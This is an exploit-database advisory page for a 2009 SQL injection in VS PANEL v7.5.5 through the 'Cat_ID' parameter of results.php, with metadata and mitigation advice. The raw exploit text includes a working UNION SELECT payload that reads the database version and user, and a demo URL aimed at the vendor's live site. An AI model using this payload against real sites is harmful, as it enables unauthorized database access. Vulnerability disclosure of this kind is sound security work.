SQL Injection in VS PANEL v.7.5.5

vendor:

VS PANEL

by:

Otavio Augusto a.k.a octopos

7,5

CVSS

HIGH

SQL Injection

CWE

Product Name: VS PANEL

Affected Version From: 7.5.5

Affected Version To: 7.5.5

Patch Exists: YES

Related CWE: N/A

CPE: a:vspanel:vspanel:7.5.5

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2009

SQL Injection in VS PANEL v.7.5.5

A SQL injection vulnerability exists in VS PANEL v.7.5.5, which allows an attacker to execute arbitrary SQL commands via the 'Cat_ID' parameter in the 'results.php' script. The vulnerability is due to the application not properly sanitizing user-supplied input before using it in an SQL query. An attacker can exploit this vulnerability to gain access to the application database, disclose sensitive information, modify data, and compromise the application and the underlying system.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries in a way that would allow an attacker to modify the logic of the executed query. Parameterized queries should be used to ensure that user-supplied input is treated as a literal value and not as executable code.

Source

Exploit-DB raw data:

#################### Infos ########################################
# [Re]Found : Otavio Augusto a.k.a octopos ( octopos8?gmail.com ) #
# Product: VS PANEL v.7.5.5   (Patched?)                          #
# Homepage: http://www.vspanel.gr/                                #
###################################################################

############################################################
# Bug Original posted in http://milw0rm.com/exploits/9171  #
# Appears that VS PANELS V7.5.5 was "corrected" the bug    #
# changing the number of columns to 26... Oo               #                                                                                              
############################################################

############################################## SQL Injection #################################################################################
#  site/path/results.php?Cat_ID=null+union+all+select+1,version(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--    #
##############################################################################################################################################


############################################### Demo ###################################################################################################
# http://www.vspanel.gr/results.php?Cat_ID=null++union+all+select+1,version(),user(),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26--  #
########################################################################################################################################################

# milw0rm.com [2009-07-27]